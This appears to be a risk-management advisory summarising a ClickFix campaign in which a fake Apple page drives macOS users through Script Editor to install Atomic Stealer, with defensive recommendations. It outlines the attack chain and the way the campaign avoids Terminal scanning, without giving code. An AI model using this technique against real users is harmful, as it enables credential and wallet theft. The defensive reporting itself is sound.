ClickFix Campaign Delivers macOS Malware via Fake Apple Page, Compromising Keychain and Financial Data
What Happened — Attackers hosted a counterfeit Apple‑styled webpage that coaxed macOS users into clicking an “Execute” button. The page opened Script Editor with a pre‑loaded AppleScript that, when saved and run, silently fetched and executed a variant of the Atomic Stealer (AMOS) malware.
Why It Matters for TPRM —
- The technique bypasses macOS’s new Terminal‑command‑scanning feature by leveraging Script Editor, a default macOS app.
- Atomic Stealer harvests Keychain credentials, browser autofill data, cookies, and crypto wallet files, exposing downstream vendors and SaaS services that trust these credentials.
- The campaign demonstrates a resurgence of ClickFix‑style social engineering, now targeting macOS users at scale.
Who Is Affected — Technology SaaS providers, financial services firms, and any organization whose employees use macOS devices for privileged access.
Recommended Actions —
- Review and harden macOS endpoint policies to block Script Editor launches from web browsers.
- Deploy EDR/EDR‑compatible detections for unauthorized AppleScript execution.
- Conduct user awareness training focused on ClickFix and other copy‑paste‑based attacks.
- Verify that third‑party vendors enforce MFA and least‑privilege for accounts that could be harvested from macOS Keychain.
Technical Notes — Attack vector: phishing‑style web page → Script Editor → AppleScript → download of Atomic Stealer. No known CVE; the malware steals system info, Keychain passwords, browser autofill, credit‑card data, and cryptocurrency wallet files. Source: Help Net Security